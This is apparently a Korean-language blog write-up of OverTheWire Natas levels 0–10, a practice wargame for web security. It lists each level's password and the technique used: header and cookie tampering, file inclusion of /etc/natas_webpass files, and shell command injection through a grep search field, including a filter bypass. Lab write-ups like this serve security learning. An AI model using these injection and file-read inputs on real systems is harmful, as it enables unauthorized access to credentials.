Post

Natas 1 ~ 10

Natas

1
2
3
4
Each level of natas consists of its own website located at 
http://natasX.natas.labs.overthewire.org, where X is the level number.

All passwords are also stored in /etc/natas_webpass/

Natas0

1
2
3
4
5
6
7
Username: natas0
Password: natas0
URL:      http://natas0.natas.labs.overthewire.org

You can find the password for the next level on this page.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->

Natas1

1
2
3
4
5
Username: natas1
Password: gtVrDuiDfck831PqWsLEZy5gyDz1clto
URL:      http://natas1.natas.labs.overthewire.org

next level on this page, but rightclicking has been blocked!
1
2
F12 -> source -> index
<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->

Natas2

1
2
3
4
5
6
Username: natas2
Password: ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi
URL:      http://natas2.natas.labs.overthewire.org

There is nothing on this page
<img src="/files/pixel.png>
1
2
3
4
5
6
7
8
9
10
페이지소스를 보면 /files/pixel.png가 있음. 1x1 사이즈였고 처음엔 여기에 뭐가 있나 싶어서 사이즈를 늘려보았지만 없었음.
그래서 /files 폴더를 확인해보았고 users.txt파일 발견

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH

Natas3

1
2
3
4
5
6
Username: natas3
Password: sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
URL:      http://natas3.natas.labs.overthewire.org

There is nothing on this page
<!-- No more information leaks!! Not even Google will find it this time... -->
1
2
3
4
5
6
정보를 주지 않는다고 해서 robots.txt를 확인했음.
User-agent: *
Disallow: /s3cr3t/

들어가면 users.txt가 있음.
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

Natas4

1
2
3
4
5
Username: natas4
Password: Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ
URL:      http://natas4.natas.labs.overthewire.org

Access disallowed. You are visiting from "" while authorized users should come only from "http://natas5.natas.labs.overthewire.org/"
1
2
Referer 요청 헤더는 현재 요청된 페이지의 링크 이전의 웹 페이지 주소를 포함합니다.
Referer 요청 헤더는 현재 요청된 페이지의 링크 이전의 웹 페이지 주소를 포함합니다. Referer 헤더는 사람들이 어디로부터 와서 방문 중인지를 인식할 수 있도록 해주며 해당 데이터는 예를 들어, 분석, 로깅, 혹은 캐싱 최적화에 사용될 수도 있습니다.

Referer

1
2
3
4
5
6
7
burp suite로 Referer를 변경시켜주면 됨.

Request Header
Referer: http://natas5.natas.labs.overthewire.org/

Response
Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

Natas5

1
2
3
4
5
Username: natas5
Password: iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
URL:      http://natas5.natas.labs.overthewire.org

Access disallowed. You are not logged in
1
2
3
burp suite로 보면 loggedin=0이 있음. 이를 1로 변경시켜주면 됨.

Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1

Natas6

1
2
3
4
5
6
Username: natas6
Password: aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
URL:      http://natas6.natas.labs.overthewire.org

input secret : []
[제출]
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
<?
include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>
1
2
3
4
5
6
.inc 파일을 검색해봤더니 include해서 사용하려는 목적으로 만든 파일로 딱히 .php와 차이x
따라서 /includes/secret.inc 파일을 확인해주면 아래의 php파일이 출력됨.
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>
Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

Natas7

1
2
3
4
5
Username: natas7
Password: 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9
URL:      http://natas7.natas.labs.overthewire.org

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
1
2
LFI 문제인듯.
page=/etc/natas_webpass/natas8 -> DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

Natas8

1
2
3
Username: natas8
Password: DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe
URL:      http://natas8.natas.labs.overthewire.org
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?
$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>
1
2
3
bin2hex ( string $str ) : string ->  binary를 hex로 변환
hex2bin ( string $data ) : string -> hex를 binary로 변환
그냥 거꾸로 코딩해주면 됨.
1
2
3
4
5
<?php
$a='3d3d516343746d4d6d6c315669563362';
$b=base64_decode(strrev(hex2bin($a)));
echo $b;
?>
1
2
input : oubWYf2kBq
Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl

Natas9

1
2
3
4
5
6
7
Username: natas9
Password: W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl
URL:      http://natas9.natas.labs.overthewire.org

Find words containing: [] [search]

Output: 
1
2
3
4
5
6
7
8
9
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
1
2
3
4
5
6
7
8
passthru ( string $command [, int &$return_var ] ) : void 
-> 외부 프로그램 실행하고 화면을 실시간 출력
linux는 명령어를 세미콜론, &, &&, ||을 통해 여러개를 동시에 실행시킬 수 있음.
따라서 african dictionary.txt; cat /etc/natas_webpass/natas10라고 해주면 플레그 겟

African
Africans
nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

Natas10

1
2
3
4
5
6
7
8
Username: natas10
Password: nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
URL:      http://natas10.natas.labs.overthewire.org

For security reasons, we now filter on certain characters
Find words containing: [] [search]

Output:
1
2
3
4
5
6
7
8
9
10
11
12
13
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
1
2
3
4
5
6
이번엔 ;, |, &를 필터링하였음. 위에 문제에서도 풀리는 방법인데 
. /etc/natas_webpass/natas11 또는 ^ /etc/natas_webpass/natas11

/etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

풀이에서는 [0-9]로 찾아냄.
This post is licensed under CC BY 4.0 by the author.